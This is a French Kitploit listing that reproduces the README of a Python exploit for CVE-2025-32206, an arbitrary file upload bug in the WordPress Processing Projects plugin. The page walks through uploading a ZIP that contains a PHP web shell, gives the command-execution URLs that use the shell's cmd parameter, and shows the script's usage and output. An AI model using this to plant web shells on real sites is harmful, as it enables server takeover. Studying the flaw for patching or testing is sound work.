Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32206 — Le plugin WordPress Processing Projects <= 1.0.2 est vulnérable au téléchargement arbitraire de fichiers. | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-32206
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'Intrusion
GitHubnxploited/cve-2025-32206

CVE-2025-32206

Le plugin WordPress Processing Projects <= 1.0.2 est vulnérable au téléchargement arbitraire de fichiers.

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-32206 - WordPress Processing Projects <= 1.0.2 Exploit de Téléchargement Arbitraire de Fichier

Bannière CVE-2025-32206


🔍 Informations sur la CVE

  • ID CVE : CVE-2025-32206
  • Type de vulnérabilité : Téléchargement de fichier sans restriction (Web Shell Upload)
  • Plugin concerné : Plugin WordPress Processing Projects
  • Versions affectées : De inconnue (n/a) jusqu'à 1.0.2
  • Score CVSS : 9,1 (CRITIQUE)
  • Vecteur : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

« Vulnérabilité de téléchargement sans restriction d'un fichier de type dangereux dans LABCAT Processing Projects permettant à des attaquants de télécharger une coquille web (web shell) sur un serveur web. Cela peut conduire à une compromission totale. »


🧑‍💻 Description de l'exploit

Ce script d'exploitation en Python cible les sites WordPress utilisant le plugin vulnérable Processing Projects (version <= 1.0.2). Le plugin gère incorrectement les téléchargements de fichiers provenant d'utilisateurs authentifiés, leur permettant ainsi de télécharger des fichiers ZIP arbitraires contenant du code PHP exécutable (coquilles web).

Le script d'exploitation :

  1. S'authentifie sur le site WordPress cible en tant qu'administrateur.
  2. Navigue vers le point de terminaison vulnérable et extrait automatiquement les champs nonce.
  3. Crée un fichier ZIP (Nxploited.zip) contenant une coquille PHP malveillante (Nxploit.php).
  4. Télécharge le fichier via une requête POST imitant le comportement de l'administration WordPress.
  5. Vérifie si la coquille est accessible à l'adresse :
    • http://target.com/wp-content/uploads/processing-projects/Nxploit.php

🐚 Utilisation de la coquille

Une fois la coquille téléchargée avec succès, elle peut être utilisée pour exécuter des commandes système via le paramètre cmd. Exemples :

root@kitploit:~
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls

Cette coquille exécute des commandes OS arbitraires et retourne leur résultat directement dans la réponse.


🚀 Utilisation

root@kitploit:~
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit pour CVE-2025-32206 | Par Nxploited (Khaled Alenazi)

options:
  -h, --help            affiche ce message d'aide et quitte
  -u, --url URL         URL cible WordPress (ex. http://target.com/wordpress)
  -un, --username USERNAME     nom d'utilisateur administrateur WordPress
  -p, --password PASSWORD      mot de passe administrateur WordPress

📄 Exemple de sortie

root@kitploit:~

[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Téléchargement arbitraire de fichier
[+] Par Nxploited | Khaled Alenazi

[+] Archive zip créée avec la coquille : Nxploited.zip -> Nxploit.php
[+] Connexion réussie.
[+] Champs du formulaire extraits avec succès.
[+] Requête de téléchargement envoyée avec succès.
[+] Coquille exécutée à : http://target.com/wp-content/uploads/processing-projects/Nxploit.php

⚠️ Avertissement

Ce script est fourni à des fins éducatives uniquement. Toute utilisation non autorisée de cet exploit sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale et contraire à l'éthique.

Suivez toujours les pratiques de divulgation responsable et n'utilisez cet outil que dans des environnements contrôlés ou avec une autorisation explicite.


Par : Nxploited | Khaled Alenazi

Télécharger l’outil